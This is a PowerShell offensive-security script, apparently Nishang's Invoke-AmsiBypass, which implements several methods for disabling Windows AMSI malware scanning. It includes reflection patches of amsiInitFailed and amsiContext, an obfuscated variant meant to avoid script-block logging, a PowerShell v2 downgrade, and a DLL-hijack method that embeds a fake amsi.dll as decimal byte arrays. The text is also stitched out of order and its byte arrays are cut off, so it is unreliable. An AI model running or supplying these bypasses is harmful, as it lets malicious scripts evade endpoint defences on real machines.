0 0 0 8 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 136 3 0 0 0 48 0 0 0 2 0 0 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 103 102 105 100 115 0 0 20 0 0 0 0 64 0 0 0 2 0 0 0 28 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 80 0 0 0 2 0 0 0 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 44 1 0 0 0 96 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 194 12 0 59 13 4 48 0 16 242 117 2 242 195 242 233 96 3 0 0 85 139 236 139 69 12 131 232 0 116 51 131 232 1 116 32 131 232 1 116 17 131 232 1 116 5 51 192 64 235 48 232 245 4 0 0 235 5 232 207 4 0 0 15 182 192 235 31 255 117 16 255 117 8 232 24 0 0 0 89 235 16 131 125 16 0 15 149 192 15 182 192 80 232 23 1 0 0 89 93 194 12 0 106 16 104 24 36 0 16 232 123 9 0 0 106 0 232 35 5 0 0 89 132 192 117 7 51 192 233 224 0 0 0 232 40 4 0 0 136 69 227 179 1 136 93 231 131 101 252 0 131 61 60 51 0 16 0 116 7 106 7 232 203 7 0 0 199 5 60 51 0 16 1 0 0 0 232 74 4 0 0 132 192 116 101 232 206 8 0 0 104 186 25 0 16 232 177 6 0 0 232 93 7 0 0 199 4 36 57 24 0 16 232 160 6 0 0 232 112 7 0 0 199 4 36 128 32 0 16 104 124 32 0 16 232 78 11 0 0 89 89 133 192 117 41 232 237 3 0 0 132 192 116 32 104 120 32 0 16 104 116 32 0 16 232 42 11 0 0 89 89 199 5 60 51 0 16 2 0 0 0 50 219 136 93 231 199 69 252 254 255 255 255 232 68 0 0 0 132 219 15 133 76 255 255 255 232 52 7 0 0 139 240 131 62 0 116 30 86 232 40 5 0 0 89 132 192 116 19 255 117 12 106 2 255 117 8 139 54 139 206 232 136 8 0 0 255 214 255 5 24 48 0 16 51 192 64 232 201 8 0 0 195 138 93 231 255 117 227 232 131 5 0 0 89 195 106 12 104 56 36 0 16 232 105 8 0 0 161 24 48 0 16 133 192 127 4 51 192 235 79 72 163 24 48 0 16 232 22 3 0 0 136 69 228 131 101 252 0 131 61 60 51 0 16 2 116 7 106 7 232 190 6 0 0 232 180 3 0 0 131 37 60 51 0 16 0 199 69 252 254 255 255 255 232 27 0 0 0 106 0 255 117 8 232 65 5 0 0 89 89 51 201 132 192 15 149 193 139 193 232 78 8 0 0 195 232 164 3 0 0 255 117 228 232 6 5 0 0 89 195 106 12 104 88 36 0 16 232 236 7 0 0 131 101 252 0 139 1
$AmsiX64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 148 172 98 253 208 205 12 174 208 205 12 174 208 205 12 174 217 181 159 174 210 205 12 174 190 150 13 175 211 205 12 174 190 150 15 175 210 205 12 174 190 150 9 175 216 205 12 174 190 150 8 175 217 205 12 174 13 50 199 174 210 205 12 174 208 205 13 174 240 205 12 174 2 150 4 175 209 205 12 174 2 150 243 174 209 205 12 174 2 150 14 175 209 205 12 174 82 105 99 104 208 205 12 174 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 7 0 136 29 62 87 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 16 0 0 0 28 0 0 0 0 0 0 160 19 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 128 0 0 0 4 0 0 0 0 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 108 38 0 0 80 0 0 0 0 96 0 0 224 1 0 0 0 64 0 0 176 1 0 0 0 0 0 0 0 0 0 0 0 112 0 0 24 0 0 0 112 33 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 33 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 248 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 211 14 0 0 0 16 0 0 0 16 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 128 10 0 0 0 32 0 0 0 12 0 0 0 20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 64 6 0 0 0 48 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 112 100 97 116 97 0 0 176 1 0 0 0 64 0 0 0 2 0 0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 103 102 105 100 115 0 0 16 0 0 0 0 80 0 0 0 2 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 96 0 0 0 2 0 0 0 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 24 0 0 0 0 112 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 195 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 72 59 13 217 31 0 0 242 117 18 72 193 193 16 102 247 193 255 255 242 117 2 242 195 72 193 201 16 233 211 3 0 0 204 204 204 72 131 236 40 133 210 116 57 131 234 1 116 40 131 234 1 116 22 131 250 1 116 10 184 1 0 0 0 72 131 196 40 195 232 142 5 0 0 235 5 232 95 5 0 0 15 182 192 72 131 196 40 195 73 139 208 72 131 196 40 233 15 0 0 0 77 133 192 15 149 193 72 131 196 40 233 44 1 0 0 72 137 92 36 8 72 137 116 36 16 72 137 124 36 32 65 86 72 131 236 32 72 139 242 76 139 241 51 201 232 2 6 0 0 132 192 117 7 51 192 233 232 0 0 0 232 150 4 0 0 138 216 136 68 36 64 64 183 1 131 61 234 36 0 0 0 116 10 185 7 0 0 0 232 62 9 0 0 199 5 212 36 0 0 1 0 0 0 232 199 4 0 0 132 192 116 103 232 110 10 0 0 72 141 13 179 10 0 0 232 6 8 0 0 232 197 8 0 0 72 141 13 206 8 0 0 232 245 7 0 0 232 224 8 0 0 72 141 21 253 15 0 0 72 141 13 238 15 0 0 232 213 12 0 0 133 192 117 41 232 96 4 0 0 132 192 116 32 72 141 21 205 15 0 0 72 141 13 190 15 0 0 232 175 12 0 0 199 5 103 36 0 0 2 0 0 0 64 50 255 138 203 232 9 7 0 0 64 132 255 15 133 78 255 255 255 232 167 8 0 0 72 139 216 72 131 56 0 116 36 72 139 200 232 78 6 0 0 132 192 116 24 72 139 27 72 139 203 232 111 10 0 0 76 139 198 186 2 0 0 0 73 139 206 255 211 255 5 156 30 0 0 184 1 0 0 0 72 139 92 36 48 72 139 116 36 56 72 139 124 36 72 72 131 196 32 65 94 195 204 72 137 92 36 8 72 137 116 36 24 87 72 131 236 32 64 138 241 139 5 104 30 0 0 51 219 133 192 127 4 51 192 235 80 255 200 137 5 86 30 0 0 232 109 3 0 0 64 138 248 136 68 36 56 131 61 1
if (([IntPtr]::Size) -eq 8)
{
Write-Verbose "64 bit process detected."
$DllBytes = $AmsiX64
}
elseif (([IntPtr]::Size) -eq 4)
{
Write-Verbose "32 bit process detected."
$DllBytes = $AmsiX86
}
switch($method)
{
"unload"
{
Write-Verbose "Using Matt Graeber's Reflection method."
if ($ShowOnly -eq $True)
{
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output '[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
}
else
{
Write-Output "Executing the bypass."
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
}
}
"unloadsilent"
{
Write-Verbose "Using Matt Graeber's Reflection method with WMF5 autologging bypass."
if ($ShowOnly -eq $True)
{
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output '[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags'')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType(''System.T''+''ype'')), [Object]([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'')),(''GetFie''+''ld'')).Invoke(''amsiInitFailed'',((''Non''+''Public,Static'') -as [String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags''))).SetValue($null,$True)'
}
else
{
Write-Output "Executing the bypass."
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
}
}
"unloadobfuscated"
{
Write-Verbose "Using Matt Graeber's Reflection method with obfuscation from Daneil Bohannon's Invoke-Obfuscation - which bypasses WMF5 autologging."
if ($ShowOnly -eq $True)
{
$code = @"
Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)])
"@
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output $code
}
else
{
Write-Output "Executing the bypass."
Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)])
}
}
"unload2"
{
Write-Verbose "Using Matt Graeber's second Reflection method."
if ($ShowOnly -eq $True)
{
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output '[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiContext'',[Reflection.BindingFlags]''NonPublic,Static'').GetValue($null),0x41414141)'
}
else
{
Write-Output "Executing the bypass."
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
}
}
"dllhijack"
{
Write-Verbose "Using Cornelis de Plaa's DLL hijack method."
if ($ShowOnly -eq $True)
{
Write-Output "Copy powershell.exe from C:\Windows\System32\WindowsPowershell\v1.0 to a local folder and dropa fake amsi.dll in the same directory."
Write-Output "Run the new powershell.exe and AMSI should be gone for that session."
}
else
{
[Byte[]] $temp = $DllBytes -split ' '
Write-Output "Executing the bypass."
Write-Verbose "Dropping the fake amsi.dll to disk."
[System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp)
Write-Verbose "Copying powershell.exe to the current working directory."
Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd
Write-Verbose "Starting powershell.exe from the current working directory."
& "$pwd\powershell.exe"
}
}
"psv2"
{
Write-Verbose "Using PowerShell version 2 which doesn't support AMSI."
if ($ShowOnly -eq $True)
{
Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process."
}
else
{
Write-Verbose "Checking if .Net version 2.0.50727 is installed."
$versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version
if($versions -match "2.0.50727")
{
Write-Verbose ".Net version 2.0.50727 found."
Write-Output "Executing the bypass."
powershell.exe -version 2
}
else
{
Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2."
}
}
}
"obfuscation"
{
Write-Output "AMSI and the AVs which support it can be bypassed using obfuscation techqniues."
Write-Output "ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) and Invoke-Obfuscation can be used (https://github.com/danielbohannon/Invoke-Obfuscation)."
}
}
}
function Invoke-AmsiBypass
{
<#
.SYNOPSIS
Nishang script which uses publicly known methods to bypass/avoid AMSI.
.DESCRIPTION
This script implements publicly known methods bypass or avoid AMSI on Windows machines.
AMSI is a script malware detection mechanism enabled by default in Windows 10.
(https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx)
This script implements 6 methods of bypassing AMSI.
unload - Method by Matt Graeber. Unloads AMSI from current PowerShell session.
unload2 - Another method by Matt Graeber. Unloads AMSI from current PowerShell session.
unloadsilent - Another method by Matt Graeber. Unloads AMSI and avoids WMF5 autologging.
unloadobfuscated - 'unload' method above obfuscated with Daneil Bohannon's Invoke-Obfuscation - which avoids WMF5 autologging.
dllhijack - Method by Cornelis de Plaa. The amsi.dll used in the code is from p0wnedshell (https://github.com/Cn33liz/p0wnedShell)
psv2 - If .net 2.0.50727 is available on Windows 10. PowerShell v2 is launched which doesn't support AMSI.
The script also provides information on tools which can be used for obfuscation:
ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/)
Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation)
.PARAMETER Method
The method to be used for elevation. Defaut one is unloadsilent.
.PARAMETER ShowOnly
The bypass is not executed. Just shown to the user.
.EXAMPLE
PS > Invoke-AmsiBypass -Verbose
Above command runs the unloadsilent method.
.EXAMPLE
PS > Invoke-PsUACme -Method unloadobfuscated -Verbose
Above command runs the unloadobfuscated method.
.LINK
http://www.labofapenetrationtester.com/2016/09/amsi.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[ValidateSet("unload","unloadsilent","unloadobfuscated","unload2","dllhijack","psv2","obfuscation")]
[String]
$Method = "unloadsilent",
[Parameter(Position = 1, Mandatory = $False)]
[Switch]
$ShowOnly
)
$AmsiX86 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 190 171 71 149 250 202 41 198 250 202 41 198 250 202 41 198 243 178 186 198 248 202 41 198 148 145 40 199 249 202 41 198 148 145 42 199 251 202 41 198 148 145 44 199 242 202 41 198 148 145 45 199 241 202 41 198 39 53 226 198 248 202 41 198 250 202 40 198 231 202 41 198 40 145 33 199 251 202 41 198 40 145 214 198 251 202 41 198 40 145 43 199 251 202 41 198 82 105 99 104 250 202 41 198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 144 29 62 87 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 14 0 0 0 18 0 0 0 0 0 0 43 19 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 112 0 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 148 36 0 0 80 0 0 0 0 80 0 0 224 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 44 1 0 0 176 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 33 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 124 12 0 0 0 16 0 0 0 14 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 220 7 0 0 0 32 0 0 0 8 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 136 3 0 0 0 48 0 0 0 2 0 0 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 103 102 105 100 115 0 0 20 0 0 0 0 64 0 0 0 2 0 0 0 28 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 80 0 0 0 2 0 0 0 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 44 1 0 0 0 96 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 194 12 0 59 13 4 48 0 16 242 117 2 242 195 242 233 96 3 0 0 85 139 236 139 69 12 131 232 0 116 51 131 232 1 116 32 131 232 1 116 17 131 232 1 116 5 51 192 64 235 48 232 245 4 0 0 235 5 232 207 4 0 0 15 182 192 235 31 255 117 16 255 117 8 232 24 0 0 0 89 235 16 131 125 16 0 15 149 192 15 182 192 80 232 23 1 0 0 89 93 194 12 0 106 16 104 24 36 0 16 232 123 9 0 0 106 0 232 35 5 0 0 89 132 192 117 7 51 192 233 224 0 0 0 232 40 4 0 0 136 69 227 179 1 136 93 231 131 101 252 0 131 61 60 51 0 16 0 116 7 106 7 232 203 7 0 0 199 5 60 51 0 16 1 0 0 0 232 74 4 0 0 132 192 116 101 232 206 8 0 0 104 186 25 0 16 232 177 6 0 0 232 93 7 0 0 199 4 36 57 24 0 16 232 160 6 0 0 232 112 7 0 0 199 4 36 128 32 0 16 104 124 32 0 16 232 78 11 0 0 89 89 133 192 117 41 232 237 3 0 0 132 192 116 32 104 120 32 0 16 104 116 32 0 16 232 42 11 0 0 89 89 199 5 60 51 0 16 2 0 0 0 50 219 136 93 231 199 69 252 254 255 255 255 232 68 0 0 0 132 219 15 133 76 255 255 255 232 52 7 0 0 139 240 131 62 0 116 30 86 232 40 5 0 0 89 132 192 116 19 255 117 12 106 2 255 117 8 139 54 139 206 232 136 8 0 0 255 214 255 5 24 48 0 16 51 192 64 232 201 8 0 0 195 138 93 231 255 117 227 232 131 5 0 0 89 195 106 12 104 56 36 0 16 232 105 8 0 0 161 24 48 0 16 133 192 127 4 51 192 235 79 72 163 24 48 0 16 232 22 3 0 0 136 69 228 131 101 252 0 131 61 60 51 0 16 2 116 7 106 7 232 190 6 0 0 232 180 3 0 0 131 37 60 51 0 16 0 199 69 252 254 255 255 255 232 27 0 0 0 106 0 255 117 8 232 65 5 0 0 89 89 51 201 132 192 15 149 193 139 193 232 78 8 0 0 195 232 164 3 0 0 255 117 228 232 6 5 0 0 89 195 106 12 104 88 36 0 16 232 236 7 0 0 131 101 252 0 139 1
$AmsiX64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 148 172 98 253 208 205 12 174 208 205 12 174 208 205 12 174 217 181 159 174 210 205 12 174 190 150 13 175 211 205 12 174 190 150 15 175 210 205 12 174 190 150 9 175 216 205 12 174 190 150 8 175 217 205 12 174 13 50 199 174 210 205 12 174 208 205 13 174 240 205 12 174 2 150 4 175 209 205 12 174 2 150 243 174 209 205 12 174 2 150 14 175 209 205 12 174 82 105 99 104 208 205 12 174 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 7 0 136 29 62 87 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 16 0 0 0 28 0 0 0 0 0 0 160 19 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 128 0 0 0 4 0 0 0 0 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 108 38 0 0 80 0 0 0 0 96 0 0 224 1 0 0 0 64 0 0 176 1 0 0 0 0 0 0 0 0 0 0 0 112 0 0 24 0 0 0 112 33 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 33 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 248 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 211 14 0 0 0 16 0 0 0 16 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 128 10 0 0 0 32 0 0 0 12 0 0 0 20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 64 6 0 0 0 48 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 112 100 97 116 97 0 0 176 1 0 0 0 64 0 0 0 2 0 0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 103 102 105 100 115 0 0 16 0 0 0 0 80 0 0 0 2 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 96 0 0 0 2 0 0 0 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 24 0 0 0 0 112 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 195 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 72 59 13 217 31 0 0 242 117 18 72 193 193 16 102 247 193 255 255 242 117 2 242 195 72 193 201 16 233 211 3 0 0 204 204 204 72 131 236 40 133 210 116 57 131 234 1 116 40 131 234 1 116 22 131 250 1 116 10 184 1 0 0 0 72 131 196 40 195 232 142 5 0 0 235 5 232 95 5 0 0 15 182 192 72 131 196 40 195 73 139 208 72 131 196 40 233 15 0 0 0 77 133 192 15 149 193 72 131 196 40 233 44 1 0 0 72 137 92 36 8 72 137 116 36 16 72 137 124 36 32 65 86 72 131 236 32 72 139 242 76 139 241 51 201 232 2 6 0 0 132 192 117 7 51 192 233 232 0 0 0 232 150 4 0 0 138 216 136 68 36 64 64 183 1 131 61 234 36 0 0 0 116 10 185 7 0 0 0 232 62 9 0 0 199 5 212 36 0 0 1 0 0 0 232 199 4 0 0 132 192 116 103 232 110 10 0 0 72 141 13 179 10 0 0 232 6 8 0 0 232 197 8 0 0 72 141 13 206 8 0 0 232 245 7 0 0 232 224 8 0 0 72 141 21 253 15 0 0 72 141 13 238 15 0 0 232 213 12 0 0 133 192 117 41 232 96 4 0 0 132 192 116 32 72 141 21 205 15 0 0 72 141 13 190 15 0 0 232 175 12 0 0 199 5 103 36 0 0 2 0 0 0 64 50 255 138 203 232 9 7 0 0 64 132 255 15 133 78 255 255 255 232 167 8 0 0 72 139 216 72 131 56 0 116 36 72 139 200 232 78 6 0 0 132 192 116 24 72 139 27 72 139 203 232 111 10 0 0 76 139 198 186 